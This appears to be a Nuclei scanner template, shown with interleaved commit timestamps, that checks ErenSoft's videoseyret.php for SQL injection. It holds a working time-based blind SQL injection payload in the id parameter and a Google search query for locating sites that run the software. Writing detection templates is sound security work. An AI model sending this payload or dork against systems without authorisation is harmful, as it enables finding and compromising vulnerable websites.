2023-10-17 07:20:28 +00:00
id : erensoft-sqli
info :
2023-10-17 08:16:05 +00:00
name : ErenSoft - SQL Injection
2023-10-17 07:20:28 +00:00
author : r3Y3r53
severity : high
description : |
SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
reference :
- https://cxsecurity.com/issue/WLB-2023070055
metadata :
verified : true
max-request : 1
2023-10-17 17:52:26 +00:00
google-query : intext:"Kodlama:Erensoft"
2023-10-17 07:20:28 +00:00
tags : sqli,unauth,erensoft
http :
- raw :
- |
2024-06-23 05:19:02 +00:00
@timeout : 20s
2023-10-17 07:20:28 +00:00
GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1
Host : {{Hostname}}
2023-12-12 13:05:26 +00:00
matchers-condition : and
2023-10-17 07:20:28 +00:00
matchers :
- type : dsl
dsl :
2023-12-12 13:05:26 +00:00
- duration >= 6
- status_code == 200
- contains(content_type, "text/html") && contains(body, "videoseyret")
2023-10-17 07:20:28 +00:00
condition : and
2023-10-20 11:41:13 +00:00
2023-12-12 13:05:26 +00:00
- type : word
words :
- class="entry-title"
2024-06-25 10:24:38 +00:00
# digest: 4b0a00483046022100fd8f2987ba3c3b57ba87203b113df644770464430999869c8847a469611abf9702210097830aa604d30884f54b8858843b5dc28239e46cf051564a650069017178c103:922c64590222798bb761d5b6d8e72950